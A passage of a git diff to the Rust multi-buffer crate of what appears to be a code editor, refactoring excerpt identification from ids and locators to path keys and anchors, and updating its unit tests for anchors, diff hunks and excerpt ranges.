+ } + } + // This should be dead code because Empty is only constructed for an empty snapshot + AnchorSeekTarget::Empty => Ordering::Equal, + } } } -impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for Locator { - fn cmp(&self, cursor_location: &ExcerptSummary, _: ()) -> cmp::Ordering { - Ord::cmp(self, &cursor_location.excerpt_locator) +impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for PathKey { + fn cmp( + &self, + cursor_location: &ExcerptSummary, + _cx: ::Context<'_>, + ) -> cmp::Ordering { + Ord::cmp(self, &cursor_location.path_key) } } @@ -8026,26 +7478,6 @@ where } } -impl<'a> sum_tree::Dimension<'a, ExcerptSummary> for Option<&'a Locator> { - fn zero(_cx: ()) -> Self { - Default::default() - } - - fn add_summary(&mut self, summary: &'a ExcerptSummary, _: ()) { - *self = Some(&summary.excerpt_locator); - } -} - -impl<'a> sum_tree::Dimension<'a, ExcerptSummary> for Option { - fn zero(_cx: ()) -> Self { - Default::default() - } - - fn add_summary(&mut self, summary: &'a ExcerptSummary, _: ()) { - *self = Some(summary.excerpt_id); - } -} - #[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug)] struct OutputDimension(T); @@ -8101,7 +7533,7 @@ where } } -#[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug)] +#[derive(Copy, Clone, PartialOrd, Ord, Eq, PartialEq, Debug, Default)] struct ExcerptDimension(T); impl PartialEq for ExcerptDimension { @@ -8261,18 +7693,14 @@ impl Iterator for MultiBufferRows<'_> { .excerpts .item() .or(self.cursor.excerpts.prev_item())?; - let last_row = last_excerpt - .range - .context - .end - .to_point(&last_excerpt.buffer) - .row; + let buffer_snapshot = last_excerpt.buffer_snapshot(self.cursor.snapshot); + let last_row = last_excerpt.range.context.end.to_point(buffer_snapshot).row; let first_row = last_excerpt .range .context .start - .to_point(&last_excerpt.buffer) + .to_point(buffer_snapshot) .row; let expand_info = if self.is_singleton { @@ -8281,7 +7709,7 @@ impl Iterator for MultiBufferRows<'_> { let needs_expand_up = first_row == last_row && last_row > 0 && !region.diff_hunk_status.is_some_and(|d| d.is_deleted()); - let needs_expand_down = last_row < last_excerpt.buffer.max_point().row; + let needs_expand_down = last_row < buffer_snapshot.max_point().row; if needs_expand_up && needs_expand_down { Some(ExpandExcerptDirection::UpAndDown) @@ -8294,7 +7722,7 @@ impl Iterator for MultiBufferRows<'_> { } .map(|direction| ExpandInfo { direction, - excerpt_id: last_excerpt.id, + start_anchor: Anchor::Excerpt(last_excerpt.start_anchor()), }) }; self.point += Point::new(1, 0); @@ -8336,7 +7764,7 @@ impl Iterator for MultiBufferRows<'_> { } .map(|direction| ExpandInfo { direction, - excerpt_id: region.excerpt.id, + start_anchor: Anchor::Excerpt(region.excerpt.start_anchor()), }) }; @@ -8388,18 +7816,20 @@ impl<'a> MultiBufferChunks<'a> { if let Some(excerpt_chunks) = self .excerpt_chunks .as_mut() - .filter(|chunks| excerpt.id == chunks.excerpt_id) + .filter(|chunks| excerpt.end_anchor() == chunks.end) { excerpt.seek_chunks( excerpt_chunks, (self.excerpt_offset_range.start - excerpt_start) ..(self.excerpt_offset_range.end - excerpt_start), + self.snapshot, ); } else { self.excerpt_chunks = Some(excerpt.chunks_in_range( (self.excerpt_offset_range.start - excerpt_start) ..(self.excerpt_offset_range.end - excerpt_start), self.language_aware, + self.snapshot, )); } } else { @@ -8421,6 +7851,7 @@ impl<'a> MultiBufferChunks<'a> { self.excerpt_chunks = Some(excerpt.chunks_in_range( 0..(self.excerpt_offset_range.end - *self.excerpts.start()), self.language_aware, + self.snapshot, )); } } @@ -8536,7 +7967,8 @@ impl<'a> Iterator for MultiBufferChunks<'a> { } chunks } else { - let base_buffer = &self.diffs.get(buffer_id)?.base_text(); + let base_buffer = + &find_diff_state(&self.snapshot.diffs, *buffer_id)?.base_text(); base_buffer.chunks(base_text_start..base_text_end, self.language_aware) }; @@ -8733,12 +8165,6 @@ impl ToPoint for PointUtf16 { } } -impl From for EntityId { - fn from(id: ExcerptId) -> Self { - EntityId::from(id.0 as u64) - } -} - #[cfg(debug_assertions)] pub mod debug { use super::*; diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index 7e27786a76a14783f54e42c73850a888e87a3ac7..bc904d1a05488ee365ebddf36c3b30accdfb9301 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -72,6 +72,27 @@ fn test_singleton(cx: &mut App) { assert_consistent_line_numbers(&snapshot); } +#[gpui::test] +fn test_buffer_point_to_anchor_at_end_of_singleton_buffer(cx: &mut App) { + let buffer = cx.new(|cx| Buffer::local("abc", cx)); + let multibuffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx)); + + let anchor = multibuffer + .read(cx) + .buffer_point_to_anchor(&buffer, Point::new(0, 3), cx) + .unwrap(); + let (anchor, _) = multibuffer + .read(cx) + .snapshot(cx) + .anchor_to_buffer_anchor(anchor) + .unwrap(); + + assert_eq!( + anchor, + buffer.read(cx).snapshot().anchor_after(Point::new(0, 3)), + ); +} + #[gpui::test] fn test_remote(cx: &mut App) { let host_buffer = cx.new(|cx| Buffer::local("a", cx)); @@ -171,12 +192,15 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { &[ Event::Edited { edited_buffer: None, + is_local: true, }, Event::Edited { edited_buffer: None, + is_local: true, }, Event::Edited { edited_buffer: None, + is_local: true, } ] ); @@ -319,7 +343,7 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { ); let snapshot = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts_for_path(PathKey::sorted(1), cx); + multibuffer.remove_excerpts(PathKey::sorted(1), cx); multibuffer.snapshot(cx) }); @@ -346,7 +370,7 @@ fn test_excerpt_boundaries_and_clipping(cx: &mut App) { boundary.row, boundary .next - .buffer + .buffer(snapshot) .text_for_range(boundary.next.range.context) .collect::(), starts_new_buffer, @@ -413,7 +437,7 @@ async fn test_diff_hunks_in_range(cx: &mut TestAppContext) { multibuffer.update(cx, |multibuffer, cx| { multibuffer.add_diff(diff, cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -453,7 +477,7 @@ async fn test_diff_hunks_in_range(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -494,7 +518,7 @@ async fn test_diff_hunks_in_range_query_starting_at_added_row(cx: &mut TestAppCo multibuffer.update(cx, |multibuffer, cx| { multibuffer.add_diff(diff, cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -739,12 +763,27 @@ fn test_excerpt_events(cx: &mut App) { cx.subscribe( &leader_multibuffer, move |follower, _, event, cx| match event.clone() { - Event::ExcerptsAdded { + Event::BufferRangesUpdated { buffer, - predecessor, - excerpts, - } => follower.insert_excerpts_with_ids_after(predecessor, buffer, excerpts, cx), - Event::ExcerptsRemoved { ids, .. } => follower.remove_excerpts(ids, cx), + path_key, + ranges, + } => { + let buffer_snapshot = buffer.read(cx).snapshot(); + follower.set_merged_excerpt_ranges_for_path( + path_key, + buffer, + &buffer_snapshot, + ranges, + cx, + ); + } + Event::BuffersRemoved { + removed_buffer_ids, .. + } => { + for id in removed_buffer_ids { + follower.remove_excerpts_for_buffer(id, cx); + } + } Event::Edited { .. } => { *follower_edit_event_count.write() += 1; } @@ -858,9 +897,14 @@ fn test_expand_excerpts(cx: &mut App) { drop(snapshot); multibuffer.update(cx, |multibuffer, cx| { - let line_zero = multibuffer.snapshot(cx).anchor_before(Point::new(0, 0)); + let multibuffer_snapshot = multibuffer.snapshot(cx); + let line_zero = multibuffer_snapshot.anchor_before(Point::new(0, 0)); multibuffer.expand_excerpts( - multibuffer.excerpt_ids(), + multibuffer.snapshot(cx).excerpts().map(|excerpt| { + multibuffer_snapshot + .anchor_in_excerpt(excerpt.context.start) + .unwrap() + }), 1, ExpandExcerptDirection::UpAndDown, cx, @@ -1157,16 +1201,10 @@ fn test_multibuffer_anchors(cx: &mut App) { .to_offset(&old_snapshot), MultiBufferOffset(0) ); - assert_eq!(Anchor::min().to_offset(&old_snapshot), MultiBufferOffset(0)); - assert_eq!(Anchor::min().to_offset(&old_snapshot), MultiBufferOffset(0)); - assert_eq!( - Anchor::max().to_offset(&old_snapshot), - MultiBufferOffset(10) - ); - assert_eq!( - Anchor::max().to_offset(&old_snapshot), - MultiBufferOffset(10) - ); + assert_eq!(Anchor::Min.to_offset(&old_snapshot), MultiBufferOffset(0)); + assert_eq!(Anchor::Min.to_offset(&old_snapshot), MultiBufferOffset(0)); + assert_eq!(Anchor::Max.to_offset(&old_snapshot), MultiBufferOffset(10)); + assert_eq!(Anchor::Max.to_offset(&old_snapshot), MultiBufferOffset(10)); buffer_1.update(cx, |buffer, cx| { buffer.edit([(0..0, "W")], None, cx); @@ -1243,153 +1281,6 @@ fn test_multibuffer_anchors(cx: &mut App) { ); } -#[gpui::test] -fn test_resolving_anchors_after_replacing_their_excerpts(cx: &mut App) { - let buffer_1 = cx.new(|cx| Buffer::local("abcd", cx)); - let buffer_2 = cx.new(|cx| Buffer::local("ABCDEFGHIJKLMNOP", cx)); - let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - - // Create an insertion id in buffer 1 that doesn't exist in buffer 2. - // Add an excerpt from buffer 1 that spans this new insertion. - buffer_1.update(cx, |buffer, cx| buffer.edit([(4..4, "123")], None, cx)); - let excerpt_id_1 = multibuffer.update(cx, |multibuffer, cx| { - let buffer_1_snapshot = buffer_1.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(0), - buffer_1, - &buffer_1_snapshot, - vec![ExcerptRange::new((0..7).to_point(&buffer_1_snapshot))], - cx, - ); - multibuffer.excerpt_ids().into_iter().next().unwrap() - }); - - let snapshot_1 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_1.text(), "abcd123"); - - // Replace the buffer 1 excerpt with new excerpts from buffer 2. - let (excerpt_id_2, _excerpt_id_3) = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts_for_path(PathKey::sorted(0), cx); - let snapshot_2 = buffer_2.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((6..10).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - let mut ids = multibuffer - .excerpts_for_buffer(buffer_2.read(cx).remote_id(), cx) - .into_iter() - .map(|(id, _)| id); - (ids.next().unwrap(), ids.next().unwrap()) - }); - let snapshot_2 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_2.text(), "ABCD\nGHIJ\nMNOP"); - - // The old excerpt id doesn't get reused. - assert_ne!(excerpt_id_2, excerpt_id_1); - - // Resolve some anchors from the previous snapshot in the new snapshot. - // The current excerpts are from a different buffer, so we don't attempt to - // resolve the old text anchor in the new buffer. - assert_eq!( - snapshot_2.summary_for_anchor::( - &snapshot_1.anchor_before(MultiBufferOffset(2)) - ), - MultiBufferOffset(0) - ); - assert_eq!( - snapshot_2.summaries_for_anchors::(&[ - snapshot_1.anchor_before(MultiBufferOffset(2)), - snapshot_1.anchor_after(MultiBufferOffset(3)) - ]), - vec![MultiBufferOffset(0), MultiBufferOffset(0)] - ); - - // Refresh anchors from the old snapshot. The return value indicates that both - // anchors lost their original excerpt. - let refresh = snapshot_2.refresh_anchors(&[ - snapshot_1.anchor_before(MultiBufferOffset(2)), - snapshot_1.anchor_after(MultiBufferOffset(3)), - ]); - assert_eq!( - refresh, - &[ - (0, snapshot_2.anchor_before(MultiBufferOffset(0)), false), - (1, snapshot_2.anchor_after(MultiBufferOffset(0)), false), - ] - ); - - // Replace the middle excerpt with a smaller excerpt in buffer 2, - // that intersects the old excerpt. - multibuffer.update(cx, |multibuffer, cx| { - let snapshot_2 = buffer_2.read(cx).snapshot(); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - multibuffer.set_excerpt_ranges_for_path( - PathKey::sorted(1), - buffer_2.clone(), - &buffer_2.read(cx).snapshot(), - vec![ - ExcerptRange::new((0..4).to_point(&snapshot_2)), - ExcerptRange::new((5..8).to_point(&snapshot_2)), - ExcerptRange::new((12..16).to_point(&snapshot_2)), - ], - cx, - ); - }); - - let snapshot_3 = multibuffer.read(cx).snapshot(cx); - assert_eq!(snapshot_3.text(), "ABCD\nFGH\nMNOP"); - - // Resolve some anchors from the previous snapshot in the new snapshot. - // The third anchor can't be resolved, since its excerpt has been removed, - // so it resolves to the same position as its predecessor. - let anchors = [ - snapshot_2.anchor_before(MultiBufferOffset(0)), - snapshot_2.anchor_after(MultiBufferOffset(2)), - snapshot_2.anchor_after(MultiBufferOffset(6)), - snapshot_2.anchor_after(MultiBufferOffset(14)), - ]; - assert_eq!( - snapshot_3.summaries_for_anchors::(&anchors), - &[ - MultiBufferOffset(0), - MultiBufferOffset(2), - MultiBufferOffset(9), - MultiBufferOffset(13) - ] - ); - - let new_anchors = snapshot_3.refresh_anchors(&anchors); - assert_eq!( - new_anchors.iter().map(|a| (a.0, a.2)).collect::>(), - &[(0, true), (1, true), (2, true), (3, true)] - ); - assert_eq!( - snapshot_3.summaries_for_anchors::(new_anchors.iter().map(|a| &a.1)), - &[ - MultiBufferOffset(0), - MultiBufferOffset(2), - MultiBufferOffset(7), - MultiBufferOffset(13) - ] - ); -} - #[gpui::test] async fn test_basic_diff_hunks(cx: &mut TestAppContext) { let text = indoc!( @@ -1440,7 +1331,7 @@ async fn test_basic_diff_hunks(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -1486,7 +1377,7 @@ async fn test_basic_diff_hunks(cx: &mut TestAppContext) { assert_line_indents(&snapshot); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx) }); assert_new_snapshot( &multibuffer, @@ -1673,7 +1564,7 @@ async fn test_repeatedly_expand_a_diff_hunk(cx: &mut TestAppContext) { }); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -1724,7 +1615,7 @@ async fn test_repeatedly_expand_a_diff_hunk(cx: &mut TestAppContext) { // Now collapse all diff hunks multibuffer.update(cx, |multibuffer, cx| { - multibuffer.collapse_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.collapse_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -2070,6 +1961,203 @@ fn test_set_excerpts_for_buffer(cx: &mut TestAppContext) { }); } +#[gpui::test] +fn test_update_excerpt_ranges_for_path(cx: &mut TestAppContext) { + let buffer = cx.new(|cx| { + Buffer::local( + indoc! { + "row 0 + row 1 + row 2 + row 3 + row 4 + row 5 + row 6 + row 7 + row 8 + row 9 + row 10 + row 11 + row 12 + row 13 + row 14 + "}, + cx, + ) + }); + let path = PathKey::with_sort_prefix(0, rel_path("test.rs").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..4), Point::row_range(8..10)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + ----- + row 8 + row 9 + row 10 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(12..13)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 12 + row 13 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..4)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(3..5)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + row 5 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![ + Point::row_range(0..1), + Point::row_range(6..8), + Point::row_range(12..13), + ], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 0 + row 1 + ----- + row 6 + row 7 + row 8 + ----- + row 12 + row 13 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(7..9)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 6 + row 7 + row 8 + row 9 + "}, + ); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(2..3), Point::row_range(6..7)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + ----- + row 6 + row 7 + "}, + ); + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.update_excerpts_for_path( + path.clone(), + buffer.clone(), + vec![Point::row_range(3..6)], + 0, + cx, + ); + }); + assert_excerpts_match( + &multibuffer, + cx, + indoc! {"----- + row 2 + row 3 + row 4 + row 5 + row 6 + row 7 + "}, + ); +} + #[gpui::test] fn test_set_excerpts_for_buffer_rename(cx: &mut TestAppContext) { let buf1 = cx.new(|cx| { @@ -2152,43 +2240,442 @@ fn test_set_excerpts_for_buffer_rename(cx: &mut TestAppContext) { } #[gpui::test] -async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { - let base_text_1 = indoc!( - " - one - two - three - four - five - six - " - ); - let text_1 = indoc!( - " - ZERO - one - TWO +fn test_set_excerpts_for_path_replaces_previous_buffer(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| { + Buffer::local( + indoc! { + "alpha + beta + gamma + delta + epsilon + ", + }, + cx, + ) + }); + let buffer_b = cx.new(|cx| { + Buffer::local( + indoc! { + "one + two three - six - " - ); - let base_text_2 = indoc!( - " - seven - eight - nine - ten - eleven - twelve - " - ); - let text_2 = indoc!( - " - eight - nine - eleven - THIRTEEN - FOURTEEN + four + ", + }, + cx, + ) + }); + let path: PathKey = PathKey::with_sort_prefix(0, rel_path("shared/path").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + let removed_buffer_ids: Arc>> = Default::default(); + multibuffer.update(cx, |_, cx| { + let removed_buffer_ids = removed_buffer_ids.clone(); + cx.subscribe(&multibuffer, move |_, _, event, _| { + if let Event::BuffersRemoved { + removed_buffer_ids: ids, + } = event + { + removed_buffer_ids.write().extend(ids.iter().copied()); + } + }) + .detach(); + }); + + let ranges_a = vec![Point::row_range(0..1), Point::row_range(3..4)]; + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path(path.clone(), buffer_a.clone(), ranges_a.clone(), 0, cx); + }); + let (anchor_a1, anchor_a2) = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let buffer_snapshot = buffer_a.read(cx).snapshot(); + let mut anchors = ranges_a.into_iter().filter_map(|range| { + let text_range = buffer_snapshot.anchor_range_inside(range); + let start = snapshot.anchor_in_buffer(text_range.start)?; + let end = snapshot.anchor_in_buffer(text_range.end)?; + Some(start..end) + }); + ( + anchors.next().expect("should have first anchor"), + anchors.next().expect("should have second anchor"), + ) + }); + + assert_excerpts_match( + &multibuffer, + cx, + indoc! { + "----- + alpha + beta + ----- + delta + epsilon + " + }, + ); + + let buffer_a_id = buffer_a.read_with(cx, |buffer, _| buffer.remote_id()); + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + assert!( + snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_a_id), + ); + }); + + let ranges_b = vec![Point::row_range(1..2)]; + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path(path.clone(), buffer_b.clone(), ranges_b.clone(), 1, cx); + }); + let anchor_b = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let buffer_snapshot = buffer_b.read(cx).snapshot(); + ranges_b + .into_iter() + .filter_map(|range| { + let text_range = buffer_snapshot.anchor_range_inside(range); + let start = snapshot.anchor_in_buffer(text_range.start)?; + let end = snapshot.anchor_in_buffer(text_range.end)?; + Some(start..end) + }) + .next() + .expect("should have an anchor") + }); + + let buffer_b_id = buffer_b.read_with(cx, |buffer, _| buffer.remote_id()); + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + assert!( + !snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_a_id), + ); + assert!( + snapshot + .excerpts() + .any(|excerpt| excerpt.context.start.buffer_id == buffer_b_id), + ); + assert!( + multibuffer.buffer(buffer_a_id).is_none(), + "old buffer should be fully removed from the multibuffer" + ); + assert!( + multibuffer.buffer(buffer_b_id).is_some(), + "new buffer should be present in the multibuffer" + ); + }); + assert!( + removed_buffer_ids.read().contains(&buffer_a_id), + "BuffersRemoved event should have been emitted for the old buffer" + ); + + assert_excerpts_match( + &multibuffer, + cx, + indoc! { + "----- + one + two + three + four + " + }, + ); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + anchor_a1.start.cmp(&anchor_b.start, &snapshot); + anchor_a1.end.cmp(&anchor_b.end, &snapshot); + anchor_a1.start.cmp(&anchor_a2.start, &snapshot); + anchor_a1.end.cmp(&anchor_a2.end, &snapshot); + }); +} + +#[gpui::test] +fn test_stale_anchor_after_buffer_removal_and_path_reuse(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| Buffer::local("aaa\nbbb\nccc\n", cx)); + let buffer_b = cx.new(|cx| Buffer::local("xxx\nyyy\nzzz\n", cx)); + let buffer_other = cx.new(|cx| Buffer::local("111\n222\n333\n", cx)); + let path = PathKey::with_sort_prefix(0, rel_path("the/path").into_arc()); + let other_path = PathKey::with_sort_prefix(1, rel_path("other/path").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + multibuffer.set_excerpts_for_path( + other_path.clone(), + buffer_other.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + }); + + buffer_a.update(cx, |buffer, cx| { + buffer.edit( + [(Point::new(1, 0)..Point::new(1, 0), "INSERTED ")], + None, + cx, + ); + }); + + let stale_anchor = multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + snapshot.anchor_before(Point::new(1, 5)) + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.remove_excerpts(path.clone(), cx); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let offset = stale_anchor.to_offset(&snapshot); + assert!( + offset.0 <= snapshot.len().0, + "stale anchor resolved to offset {offset:?} but multibuffer len is {:?}", + snapshot.len() + ); + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path.clone(), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 3)], + 0, + cx, + ); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + let offset = stale_anchor.to_offset(&snapshot); + assert!( + offset.0 <= snapshot.len().0, + "stale anchor resolved to offset {offset:?} but multibuffer len is {:?}", + snapshot.len() + ); + }); +} + +#[gpui::test] +async fn test_map_excerpt_ranges(cx: &mut TestAppContext) { + let base_text = indoc!( + " + { + (aaa) + (bbb) + (ccc) + } + xxx + yyy + zzz + [ + (ddd) + (EEE) + ] + " + ); + let text = indoc!( + " + { + (aaa) + (CCC) + } + xxx + yyy + zzz + [ + (ddd) + (EEE) + ] + " + ); + + let buffer = cx.new(|cx| Buffer::local(text, cx)); + let diff = cx + .new(|cx| BufferDiff::new_with_base_text(base_text, &buffer.read(cx).text_snapshot(), cx)); + cx.run_until_parked(); + + let multibuffer = cx.new(|cx| { + let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); + multibuffer.set_excerpts_for_path( + PathKey::sorted(0), + buffer.clone(), + [ + Point::new(0, 0)..Point::new(3, 1), + Point::new(7, 0)..Point::new(10, 1), + ], + 0, + cx, + ); + multibuffer.add_diff(diff.clone(), cx); + multibuffer + }); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); + }); + cx.run_until_parked(); + + let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); + + let actual_diff = format_diff( + &snapshot.text(), + &snapshot.row_infos(MultiBufferRow(0)).collect::>(), + &Default::default(), + None, + ); + pretty_assertions::assert_eq!( + actual_diff, + indoc!( + " + { + (aaa) + - (bbb) + - (ccc) + + (CCC) + } [\u{2193}] + [ [\u{2191}] + (ddd) + (EEE) + ] [\u{2193}]" + ) + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(1, 3))..snapshot.point_to_offset(Point::new(1, 3)), + |buffer, excerpt_range, input_range| { + assert_eq!( + buffer.offset_to_point(input_range.start.0) + ..buffer.offset_to_point(input_range.end.0), + Point::new(1, 3)..Point::new(1, 3), + ); + assert_eq!( + buffer.offset_to_point(excerpt_range.context.start.0) + ..buffer.offset_to_point(excerpt_range.context.end.0), + Point::new(0, 0)..Point::new(3, 1), + ); + vec![ + (input_range.start..BufferOffset(input_range.start.0 + 3), ()), + (excerpt_range.context, ()), + ( + BufferOffset(text::ToOffset::to_offset(&Point::new(2, 2), buffer)) + ..BufferOffset(text::ToOffset::to_offset(&Point::new(2, 7), buffer)), + (), + ), + ( + BufferOffset(text::ToOffset::to_offset(&Point::new(0, 0), buffer)) + ..BufferOffset(text::ToOffset::to_offset(&Point::new(2, 0), buffer)), + (), + ), + ] + }, + ), + Some(vec![ + ( + snapshot.point_to_offset(Point::new(1, 3)) + ..snapshot.point_to_offset(Point::new(1, 6)), + (), + ), + ( + snapshot.point_to_offset(Point::zero())..snapshot.point_to_offset(Point::new(5, 1)), + () + ), + ( + snapshot.point_to_offset(Point::new(4, 2)) + ..snapshot.point_to_offset(Point::new(4, 7)), + (), + ), + ( + snapshot.point_to_offset(Point::zero())..snapshot.point_to_offset(Point::new(4, 0)), + () + ), + ]), + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(5, 0))..snapshot.point_to_offset(Point::new(7, 0)), + |_, _, range| vec![(range, ())], + ), + None, + ); + + assert_eq!( + snapshot.map_excerpt_ranges( + snapshot.point_to_offset(Point::new(7, 3))..snapshot.point_to_offset(Point::new(7, 6)), + |buffer, excerpt_range, input_range| { + assert_eq!( + buffer.offset_to_point(input_range.start.0) + ..buffer.offset_to_point(input_range.end.0), + Point::new(8, 3)..Point::new(8, 6), + ); + assert_eq!( + buffer.offset_to_point(excerpt_range.context.start.0) + ..buffer.offset_to_point(excerpt_range.context.end.0), + Point::new(7, 0)..Point::new(10, 1), + ); + vec![(input_range, ())] + }, + ), + Some(vec![( + snapshot.point_to_offset(Point::new(7, 3))..snapshot.point_to_offset(Point::new(7, 6)), + (), + )]), + ); +} + +#[gpui::test] +async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { + let base_text_1 = indoc!( + " + one + two + three + four + five + six + " + ); + let text_1 = indoc!( + " + ZERO + one + TWO + three + six + " + ); + let base_text_2 = indoc!( + " + seven + eight + nine + ten + eleven + twelve + " + ); + let text_2 = indoc!( + " + eight + nine + eleven + THIRTEEN + FOURTEEN " ); @@ -2246,7 +2733,7 @@ async fn test_diff_hunks_with_multiple_excerpts(cx: &mut TestAppContext) { ); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); assert_new_snapshot( @@ -2396,101 +2883,137 @@ struct ReferenceMultibuffer { excerpts: 